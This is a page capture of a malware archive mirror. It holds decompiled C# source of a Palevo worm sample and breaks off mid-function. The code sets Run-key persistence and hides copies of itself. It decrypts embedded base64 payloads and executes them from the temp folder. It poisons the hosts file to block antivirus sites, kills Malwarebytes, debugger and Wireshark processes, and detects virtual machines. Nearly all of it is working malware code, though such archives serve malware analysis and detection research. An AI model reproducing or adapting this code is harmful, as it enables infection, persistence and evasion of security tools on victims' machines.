mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
640 lines
60 KiB
C#
640 lines
60 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: pizde
|
|||
|
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using My;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Security.Cryptography;
|
|||
|
using System.Text;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
[StandardModule]
|
|||
|
internal sealed class pizde
|
|||
|
{
|
|||
|
private static string iohouh7877 = "hhhhhhhhhheeeee";
|
|||
|
private static string HostEditing = "%28%";
|
|||
|
private static string antis = "%29%";
|
|||
|
private static string stuff = "%something%";
|
|||
|
private static object Devices;
|
|||
|
private static string Grafikadapter;
|
|||
|
private static string RegionA = "SELECT * FROM Win32_VideoController";
|
|||
|
|
|||
|
[STAThread]
|
|||
|
public static void Main()
|
|||
|
{
|
|||
|
label_0:
|
|||
|
int num1;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 1;
|
|||
|
label_1:
|
|||
|
int num3 = 2;
|
|||
|
string processName = Process.GetCurrentProcess().ProcessName;
|
|||
|
label_2:
|
|||
|
num3 = 3;
|
|||
|
Process.GetProcessesByName(processName);
|
|||
|
label_3:
|
|||
|
num3 = 4;
|
|||
|
if (Operators.CompareString(pizde.iohouh7877, "hhhhhhhhhheeeee", false) != 0)
|
|||
|
goto label_11;
|
|||
|
label_4:
|
|||
|
num3 = 5;
|
|||
|
object tempPath1 = (object) Path.GetTempPath();
|
|||
|
label_5:
|
|||
|
num3 = 6;
|
|||
|
object executablePath = (object) Application.ExecutablePath;
|
|||
|
label_6:
|
|||
|
num3 = 7;
|
|||
|
object fullPath = (object) Path.GetFullPath(Conversions.ToString(executablePath));
|
|||
|
label_7:
|
|||
|
num3 = 8;
|
|||
|
FileAttributes fileAttributes1 = FileAttributes.Hidden | FileAttributes.System;
|
|||
|
label_8:
|
|||
|
num3 = 9;
|
|||
|
MyProject.Computer.Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("rundll32", Operators.ConcatenateObject(tempPath1, (object) "rundll32 .exe"));
|
|||
|
label_9:
|
|||
|
num3 = 10;
|
|||
|
FileSystem.FileCopy(Conversions.ToString(fullPath), Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")));
|
|||
|
label_10:
|
|||
|
num3 = 11;
|
|||
|
File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath1, (object) "\\"), (object) "rundll32 .exe")), fileAttributes1);
|
|||
|
label_11:
|
|||
|
num3 = 13;
|
|||
|
if (Operators.CompareString(pizde.HostEditing, "hhhhhhhhhheeeee", false) != 0)
|
|||
|
goto label_13;
|
|||
|
label_12:
|
|||
|
num3 = 14;
|
|||
|
pizde.HostEdit();
|
|||
|
goto label_14;
|
|||
|
label_13:
|
|||
|
num3 = 16;
|
|||
|
label_14:
|
|||
|
num3 = 18;
|
|||
|
pizde.AntiMalwarebytes();
|
|||
|
label_15:
|
|||
|
num3 = 19;
|
|||
|
pizde.AntiOllydbg();
|
|||
|
label_16:
|
|||
|
num3 = 20;
|
|||
|
pizde.AntiWireshark();
|
|||
|
label_17:
|
|||
|
num3 = 21;
|
|||
|
pizde.AntiVirtualBox();
|
|||
|
label_18:
|
|||
|
num3 = 22;
|
|||
|
pizde.AntiVirtualPC();
|
|||
|
label_19:
|
|||
|
num3 = 23;
|
|||
|
pizde.AntiVmWare();
|
|||
|
label_20:
|
|||
|
num3 = 24;
|
|||
|
pizde.IsDebuggerPresent();
|
|||
|
label_21:
|
|||
|
num3 = 25;
|
|||
|
string str1;
|
|||
|
string s1 = str1;
|
|||
|
label_22:
|
|||
|
num3 = 26;
|
|||
|
pizde.okitokjwe33(Convert.FromBase64String(s1));
|
|||
|
label_23:
|
|||
|
num3 = 27;
|
|||
|
string s2 = "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
|
|||
|
label_24:
|
|||
|
num3 = 28;
|
|||
|
byte[] data1 = pizde.okitokjwe33(Convert.FromBase64String(s2));
|
|||
|
label_25:
|
|||
|
num3 = 29;
|
|||
|
string str2;
|
|||
|
string s3 = str2;
|
|||
|
label_26:
|
|||
|
num3 = 30;
|
|||
|
pizde.decrypt(Convert.FromBase64String(s3), "parola");
|
|||
|
label_27:
|
|||
|
num3 = 31;
|
|||
|
string str3;
|
|||
|
string s4 = str3;
|
|||
|
label_28:
|
|||
|
num3 = 32;
|
|||
|
byte[] data2 = pizde.okitokjwe33(Convert.FromBase64String(s4));
|
|||
|
label_29:
|
|||
|
num3 = 33;
|
|||
|
Encoding.GetEncoding(1252).GetBytes(s1);
|
|||
|
label_30:
|
|||
|
num3 = 34;
|
|||
|
object tempPath2 = (object) Path.GetTempPath();
|
|||
|
label_31:
|
|||
|
num3 = 35;
|
|||
|
Directory.CreateDirectory(Conversions.ToString(Operators.ConcatenateObject(tempPath2, (object) "winamp")));
|
|||
|
label_32:
|
|||
|
num3 = 36;
|
|||
|
Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
|
|||
|
label_33:
|
|||
|
num3 = 37;
|
|||
|
string sourceFileName = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe";
|
|||
|
label_34:
|
|||
|
num3 = 38;
|
|||
|
string str4 = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe"));
|
|||
|
label_35:
|
|||
|
num3 = 39;
|
|||
|
if (File.Exists(str4))
|
|||
|
goto label_37;
|
|||
|
label_36:
|
|||
|
num3 = 40;
|
|||
|
File.Copy(sourceFileName, str4);
|
|||
|
label_37:
|
|||
|
num3 = 42;
|
|||
|
FileAttributes fileAttributes2 = FileAttributes.Hidden | FileAttributes.System;
|
|||
|
label_38:
|
|||
|
num3 = 43;
|
|||
|
File.SetAttributes(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(Operators.ConcatenateObject(tempPath2, (object) "\\"), (object) "winamp"), (object) "\\"), (object) "svhost.exe")), fileAttributes2);
|
|||
|
label_39:
|
|||
|
num3 = 44;
|
|||
|
pizde.IsProcessRunning4("sandboxierpcss.exe");
|
|||
|
label_40:
|
|||
|
num3 = 46;
|
|||
|
if (pizde.IsProcessRunning2("%temp%.exe"))
|
|||
|
goto label_45;
|
|||
|
label_41:
|
|||
|
num3 = 47;
|
|||
|
if (pizde.IsProcessRunning5("rundll32 .exe"))
|
|||
|
goto label_45;
|
|||
|
label_42:
|
|||
|
num3 = 48;
|
|||
|
string temp1 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
|
|||
|
label_43:
|
|||
|
num3 = 49;
|
|||
|
MyProject.Computer.FileSystem.WriteAllBytes(temp1 + "\\%temp%.exe", data2, false);
|
|||
|
label_44:
|
|||
|
num3 = 50;
|
|||
|
Process.Start(temp1 + "\\%temp%.exe");
|
|||
|
label_45:
|
|||
|
num3 = 53;
|
|||
|
if (pizde.IsProcessRunning3("%tmp%.exe"))
|
|||
|
goto label_49;
|
|||
|
label_46:
|
|||
|
num3 = 54;
|
|||
|
string temp2 = MyProject.Computer.FileSystem.SpecialDirectories.Temp;
|
|||
|
label_47:
|
|||
|
num3 = 55;
|
|||
|
MyProject.Computer.FileSystem.WriteAllBytes(temp2 + "\\%tmp%.exe", data1, false);
|
|||
|
label_48:
|
|||
|
num3 = 56;
|
|||
|
Process.Start(temp2 + "\\%tmp%.exe");
|
|||
|
label_49:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_56;
|
|||
|
label_51:
|
|||
|
num2 = num3;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
int num4 = num2 + 1;
|
|||
|
num2 = 0;
|
|||
|
switch (num4)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
goto label_0;
|
|||
|
case 2:
|
|||
|
goto label_1;
|
|||
|
case 3:
|
|||
|
goto label_2;
|
|||
|
case 4:
|
|||
|
goto label_3;
|
|||
|
case 5:
|
|||
|
goto label_4;
|
|||
|
case 6:
|
|||
|
goto label_5;
|
|||
|
case 7:
|
|||
|
goto label_6;
|
|||
|
case 8:
|
|||
|
goto label_7;
|
|||
|
case 9:
|
|||
|
goto label_8;
|
|||
|
case 10:
|
|||
|
goto label_9;
|
|||
|
case 11:
|
|||
|
goto label_10;
|
|||
|
case 12:
|
|||
|
case 13:
|
|||
|
goto label_11;
|
|||
|
case 14:
|
|||
|
goto label_12;
|
|||
|
case 15:
|
|||
|
case 17:
|
|||
|
case 18:
|
|||
|
goto label_14;
|
|||
|
case 16:
|
|||
|
goto label_13;
|
|||
|
case 19:
|
|||
|
goto label_15;
|
|||
|
case 20:
|
|||
|
goto label_16;
|
|||
|
case 21:
|
|||
|
goto label_17;
|
|||
|
case 22:
|
|||
|
goto label_18;
|
|||
|
case 23:
|
|||
|
goto label_19;
|
|||
|
case 24:
|
|||
|
goto label_20;
|
|||
|
case 25:
|
|||
|
goto label_21;
|
|||
|
case 26:
|
|||
|
goto label_22;
|
|||
|
case 27:
|
|||
|
goto label_23;
|
|||
|
case 28:
|
|||
|
goto label_24;
|
|||
|
case 29:
|
|||
|
goto label_25;
|
|||
|
case 30:
|
|||
|
goto label_26;
|
|||
|
case 31:
|
|||
|
goto label_27;
|
|||
|
case 32:
|
|||
|
goto label_28;
|
|||
|
case 33:
|
|||
|
goto label_29;
|
|||
|
case 34:
|
|||
|
goto label_30;
|
|||
|
case 35:
|
|||
|
goto label_31;
|
|||
|
case 36:
|
|||
|
goto label_32;
|
|||
|
case 37:
|
|||
|
goto label_33;
|
|||
|
case 38:
|
|||
|
goto label_34;
|
|||
|
case 39:
|
|||
|
goto label_35;
|
|||
|
case 40:
|
|||
|
goto label_36;
|
|||
|
case 41:
|
|||
|
case 42:
|
|||
|
goto label_37;
|
|||
|
case 43:
|
|||
|
goto label_38;
|
|||
|
case 44:
|
|||
|
goto label_39;
|
|||
|
case 45:
|
|||
|
case 46:
|
|||
|
goto label_40;
|
|||
|
case 47:
|
|||
|
goto label_41;
|
|||
|
case 48:
|
|||
|
goto label_42;
|
|||
|
case 49:
|
|||
|
goto label_43;
|
|||
|
case 50:
|
|||
|
goto label_44;
|
|||
|
case 51:
|
|||
|
case 52:
|
|||
|
case 53:
|
|||
|
goto label_45;
|
|||
|
case 54:
|
|||
|
goto label_46;
|
|||
|
case 55:
|
|||
|
goto label_47;
|
|||
|
case 56:
|
|||
|
goto label_48;
|
|||
|
case 57:
|
|||
|
goto label_49;
|
|||
|
case 58:
|
|||
|
goto label_56;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_51;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_56:
|
|||
|
if (num2 == 0)
|
|||
|
return;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern int IsDebuggerPresent();
|
|||
|
|
|||
|
public static void Main2()
|
|||
|
{
|
|||
|
if (pizde.IsDebuggerPresent() == 1)
|
|||
|
Console.WriteLine("Debugger Is Present");
|
|||
|
else
|
|||
|
Console.WriteLine("Debugger Not Present");
|
|||
|
}
|
|||
|
|
|||
|
private static void HostEdit()
|
|||
|
{
|
|||
|
StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\drivers\\etc\\\\hosts");
|
|||
|
streamWriter.Write("127.0.0.1 www.virustotal.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virustotal.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 novirusthanks.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 vscan.novirusthanks.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virusscan.jotti.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.virusscan.jotti.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virscan.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.virscan.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 virus-trap.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.virus-trap.org");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 filterbit.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.filterbit.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 viruschief.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.viruschief.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 kaspersky.com");
|
|||
|
streamWriter.Write(Environment.NewLine);
|
|||
|
streamWriter.Write("127.0.0.1 www.kaspersky.com");
|
|||
|
streamWriter.Dispose();
|
|||
|
}
|
|||
|
|
|||
|
public static bool AntiVirtualBox()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
pizde.getDevices();
|
|||
|
flag = Operators.CompareString(pizde.Grafikadapter, "VirtualBox Graphics Adapter", false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
public static bool AntiVmWare()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
pizde.getDevices();
|
|||
|
flag = Operators.CompareString(pizde.Grafikadapter, "VMware SVGA II", false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
public static bool AntiVirtualPC()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
pizde.getDevices();
|
|||
|
flag = Operators.CompareString(pizde.Grafikadapter, "VM Additions S3 Trio32/64", false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
private static void getDevices()
|
|||
|
{
|
|||
|
// ISSUE: unable to decompile the method.
|
|||
|
}
|
|||
|
|
|||
|
public static void AntiMalwarebytes()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mbam", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void AntiOllydbg()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static void AntiWireshark()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning2(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("%temp%");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning3(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("%tmp%");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning4(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("sandboxierpcss");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
private static bool IsProcessRunning5(string name)
|
|||
|
{
|
|||
|
Process[] processesByName = Process.GetProcessesByName("rundll32 ");
|
|||
|
int index = 0;
|
|||
|
if (index >= processesByName.Length)
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
return flag;
|
|||
|
}
|
|||
|
return processesByName[index] != null;
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] okitokjwe33(byte[] data)
|
|||
|
{
|
|||
|
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
|
|||
|
{
|
|||
|
rijndaelManaged.IV = new byte[16]
|
|||
|
{
|
|||
|
(byte) 1,
|
|||
|
(byte) 2,
|
|||
|
(byte) 3,
|
|||
|
(byte) 4,
|
|||
|
(byte) 5,
|
|||
|
(byte) 6,
|
|||
|
(byte) 7,
|
|||
|
(byte) 8,
|
|||
|
(byte) 9,
|
|||
|
(byte) 1,
|
|||
|
(byte) 2,
|
|||
|
(byte) 3,
|
|||
|
(byte) 4,
|
|||
|
(byte) 5,
|
|||
|
(byte) 6,
|
|||
|
(byte) 7
|
|||
|
};
|
|||
|
rijndaelManaged.Key = new byte[16]
|
|||
|
{
|
|||
|
(byte) 7,
|
|||
|
(byte) 6,
|
|||
|
(byte) 5,
|
|||
|
(byte) 4,
|
|||
|
(byte) 3,
|
|||
|
(byte) 2,
|
|||
|
(byte) 1,
|
|||
|
(byte) 9,
|
|||
|
(byte) 8,
|
|||
|
(byte) 7,
|
|||
|
(byte) 6,
|
|||
|
(byte) 5,
|
|||
|
(byte) 4,
